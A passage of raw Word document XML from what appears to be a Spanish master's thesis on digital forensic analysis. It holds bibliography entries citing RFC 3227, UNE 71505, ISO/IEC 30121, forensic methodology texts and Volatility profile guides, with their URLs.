    </w:p>
    <w:p w14:paraId="1EBAEC30" w14:textId="37293CF8" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Título del Contenedor: ISO/IEC 30121.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0403C016" w14:textId="03532033" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId290" w:history="1">
        <w:r w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://bibdigital.epn.edu.ec/bitstream/15000/23797/1/CD%2013084.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECCCE2" w14:textId="2EDAA7B3" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId291" w:history="1">
        <w:r w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/004-IMPLEMENTACION-HERRAMIENTAS-PARA-LA-EXTRACCION-DE-EVIDENCIA-DIGITAL.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7CB91D" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="49C0D237" w14:textId="72FD3126" w:rsidR="00591474" w:rsidRDefault="005D0BE7" w:rsidP="00591474">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="221" w:name="_Ref155731871"/>
      <w:bookmarkStart w:id="222" w:name="_Toc155782553"/>
      <w:r>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="00591474">
        <w:t>VI.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="221"/>
      <w:bookmarkEnd w:id="222"/>
    </w:p>
    <w:p w14:paraId="4B1009B0" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00591474"/>
    <w:p w14:paraId="16361F5B" w14:textId="7F99D1BC" w:rsidR="00591474" w:rsidRDefault="005D0BE7" w:rsidP="00591474">
      <w:r w:rsidRPr="00591474">
        <w:t>Norma RFC 3227:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44291CB4" w14:textId="2FE5BFA2" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autores:  Dominique Brezinski &amp; Tom Killalea.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783F0B5D" w14:textId="43AF00F1" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: RFC 3227.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A3F728" w14:textId="27070318" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL Español: </w:t>
      </w:r>
      <w:hyperlink r:id="rId292" w:history="1">
        <w:r w:rsidR="00E23AAF" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.rfc-es.org/pendientes/rfc3227-es.nroff</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4D837D" w14:textId="530E7CE5" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>URL Inglés:</w:t>
      </w:r>
      <w:r w:rsidR="00E23AAF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId293" w:history="1">
        <w:r w:rsidR="00E23AAF" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://datatracker.ietf.org/doc/html/rfc3227</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBA109A" w14:textId="284EFCE8" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId294" w:history="1">
        <w:r w:rsidR="00E23AAF" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/005-RFC-3227-ESP.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631BB4A4" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="4AC2CB72" w14:textId="2E03A051" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A76203A" w14:textId="38016D0B" w:rsidR="00E23AAF" w:rsidRDefault="005D0BE7" w:rsidP="00E23AAF">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="223" w:name="_Ref155731918"/>
      <w:bookmarkStart w:id="224" w:name="_Toc155782554"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="00E23AAF">
        <w:t>VII</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="223"/>
      <w:bookmarkEnd w:id="224"/>
    </w:p>
    <w:p w14:paraId="62832527" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00591474"/>
    <w:p w14:paraId="004F7BC8" w14:textId="56B46B3F" w:rsidR="00591474" w:rsidRDefault="005D0BE7" w:rsidP="00591474">
      <w:r w:rsidRPr="00E23AAF">
        <w:t>Que son las normas UNE</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACF6BA5" w14:textId="1F451BD9" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor:  Grupo ACMS Consultores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626191B1" w14:textId="30AC6F10" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: Norma UNE: Significado y Estructura.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541F287D" w14:textId="6B74B1EC" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL Español: </w:t>
      </w:r>
      <w:hyperlink r:id="rId295" w:history="1">
        <w:r w:rsidR="00E23AAF" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://www.grupoacms.com/consultora/norma-une-significado</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A61208C" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="00B151F5" w14:textId="34A7620F" w:rsidR="00E23AAF" w:rsidRDefault="005D0BE7" w:rsidP="00E23AAF">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="225" w:name="_Ref155732780"/>
      <w:bookmarkStart w:id="226" w:name="_Toc155782555"/>
      <w:r>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="00E23AAF">
        <w:t>VIII.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="225"/>
      <w:bookmarkEnd w:id="226"/>
    </w:p>
    <w:p w14:paraId="4C10B982" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00591474"/>
    <w:p w14:paraId="4409F373" w14:textId="6FF2AE2C" w:rsidR="00E23AAF" w:rsidRDefault="005D0BE7" w:rsidP="00591474">
      <w:r>
        <w:t>Norma UNE 71505</w:t>
      </w:r>
      <w:r w:rsidRPr="00591474">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A00C46" w14:textId="693A5A36" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor:  AENOR, Asociación Española de Normalización y Certificación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4103A8C7" w14:textId="3B78C243" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: Norma UNE 71505.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446EC1D8" w14:textId="0238CE9C" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId296" w:history="1">
        <w:r w:rsidR="00E23AAF" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/006-UNE-71505-2013.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA0D525" w14:textId="77777777" w:rsidR="00E23AAF" w:rsidRDefault="00E23AAF" w:rsidP="00591474"/>
    <w:p w14:paraId="2B211DF5" w14:textId="53AFCB02" w:rsidR="00810E29" w:rsidRPr="00810E29" w:rsidRDefault="005D0BE7" w:rsidP="00810E29">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="227" w:name="_Ref155732840"/>
      <w:bookmarkStart w:id="228" w:name="_Toc155782556"/>
      <w:r>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="00E23AAF" w:rsidRPr="00555249">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00555249" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00E23AAF" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
      <w:bookmarkEnd w:id="228"/>
    </w:p>
    <w:p w14:paraId="5928969C" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00591474"/>
    <w:p w14:paraId="4DB278D8" w14:textId="38A97CE1" w:rsidR="00E23AAF" w:rsidRDefault="005D0BE7" w:rsidP="00591474">
      <w:r w:rsidRPr="00555249">
        <w:t>Metodología para un análisis forense:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39327CCC" w14:textId="52D12660" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autores: Carles Gervilla Rivas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EA7387" w14:textId="37F16FDA" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: Metodología para un Análisis Forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5EDE95" w14:textId="75012AB0" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del Contenedor: DESARROLLO DE UNA METODOLOGÍA PARA EL ANÁLISIS FORENSE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8DBA1E" w14:textId="3E440647" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId297" w:history="1">
        <w:r w:rsidR="00555249" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://openaccess.uoc.edu/bitstream/10609/39681/6/cgervillarTFM1214memoria.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6729EF62" w14:textId="305D21EF" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL repositorio </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:t>GitHub</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId298" w:history="1">
        <w:r w:rsidR="00555249" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://github.com/jrodg85/TFM-ANALISIS-FORENSE/blob/main/referencias/007-METODOLOGÍA-PARA-UN-ANÁLISIS-FORENSE.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED15E50" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="7010694F" w14:textId="33CD4F76" w:rsidR="005F5944" w:rsidRPr="00555249" w:rsidRDefault="005D0BE7" w:rsidP="005F5944">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="229" w:name="_Ref155732961"/>
      <w:bookmarkStart w:id="230" w:name="_Toc155782557"/>
      <w:r>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>X.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
      <w:bookmarkEnd w:id="230"/>
    </w:p>
    <w:p w14:paraId="38E6123F" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00591474"/>
    <w:p w14:paraId="74136EEB" w14:textId="0526B478" w:rsidR="005F5944" w:rsidRDefault="005D0BE7" w:rsidP="00591474">
      <w:r w:rsidRPr="005F5944">
        <w:t>Ninjas de la web. Metodología para un análisis forense:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB84C2" w14:textId="4CFADC1B" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: Miguel Angel Olivares.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5910B06F" w14:textId="01440DAB" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: Metodología de Análisis Forense (Ninjas de la Web).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704D87BC" w14:textId="06D2A35A" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId299" w:history="1">
        <w:r w:rsidR="005F5944" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://ninjasdelaweb.com/metodologia-de-analisis-forense/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695D2956" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="35F54336" w14:textId="1D2038E0" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F950D29" w14:textId="1D530153" w:rsidR="005F5944" w:rsidRPr="00555249" w:rsidRDefault="005D0BE7" w:rsidP="005F5944">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="231" w:name="_Ref155733178"/>
      <w:bookmarkStart w:id="232" w:name="_Toc155782558"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="005F5944">
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
      <w:bookmarkEnd w:id="232"/>
    </w:p>
    <w:p w14:paraId="434A6C56" w14:textId="77777777" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00591474"/>
    <w:p w14:paraId="7700B6DB" w14:textId="26D7E3C9" w:rsidR="005F5944" w:rsidRDefault="005D0BE7" w:rsidP="00591474">
      <w:r w:rsidRPr="005F5944">
        <w:t>Cómputo Forense de Wikipedia:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4FF09F" w14:textId="7BCFFA86" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: Avelaz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCEC7E0" w14:textId="7C23C3CE" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Ultimo editor: Sabbut</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D6941F" w14:textId="2FD7CE20" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título visualizado: Cómputo forense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FD487E" w14:textId="53E66BD6" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Criterio de ordenación predeterminado: Cómputo forense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD304CE" w14:textId="59D17003" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId300" w:history="1">
        <w:r w:rsidR="005F5944" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://es.wikipedia.org/wiki/C%C3%B3mputo_forense</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6C366B" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="726F6BC9" w14:textId="3556915E" w:rsidR="005F5944" w:rsidRDefault="005D0BE7" w:rsidP="005F5944">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="233" w:name="_Ref155733932"/>
      <w:bookmarkStart w:id="234" w:name="_Toc155782559"/>
      <w:r>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="005F5944">
        <w:t>II</w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="233"/>
      <w:bookmarkEnd w:id="234"/>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C73605" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="6C2CCB12" w14:textId="0D776D79" w:rsidR="005D0BE7" w:rsidRDefault="005D0BE7" w:rsidP="00591474">
      <w:r w:rsidRPr="005F5944">
        <w:t>Creación de perfil en Volatility (hotfixed42):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D701AF4" w14:textId="69AC831B" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: hotfixed42.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C70B3C" w14:textId="2E2497B9" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Título del trabajo: Creación de perfiles linux para Volatility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F06DBBA" w14:textId="52C30565" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId301" w:history="1">
        <w:r w:rsidR="005F5944" w:rsidRPr="00974A18">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://hotfixed42.rssing.com/chan-32986353/article3.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00810E29">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45287418" w14:textId="77777777" w:rsidR="00591474" w:rsidRDefault="00591474" w:rsidP="00591474"/>
    <w:p w14:paraId="3B830FDC" w14:textId="42BDFA95" w:rsidR="005F5944" w:rsidRDefault="005D0BE7" w:rsidP="005F5944">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="235" w:name="_Ref155733958"/>
      <w:bookmarkStart w:id="236" w:name="_Toc155782560"/>
      <w:r>
        <w:t xml:space="preserve">Referencia </w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="005F5944">
        <w:t>III</w:t>
      </w:r>
      <w:r w:rsidR="005F5944" w:rsidRPr="00555249">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="235"/>
      <w:bookmarkEnd w:id="236"/>
    </w:p>
    <w:p w14:paraId="7F8E1275" w14:textId="77777777" w:rsidR="005F5944" w:rsidRDefault="005F5944" w:rsidP="005F5944"/>
    <w:p w14:paraId="5EAD5B67" w14:textId="3B985FC0" w:rsidR="005D0BE7" w:rsidRPr="005F5944" w:rsidRDefault="005D0BE7" w:rsidP="005F5944">
      <w:r w:rsidRPr="005F5944">
        <w:t>Creación de perfil en Volatility (bytelearning):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F2D37F" w14:textId="01030B9E" w:rsidR="00591474" w:rsidRDefault="00591474">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Autor: bytelearning.</w:t>
      </w:r>
    </w:p>
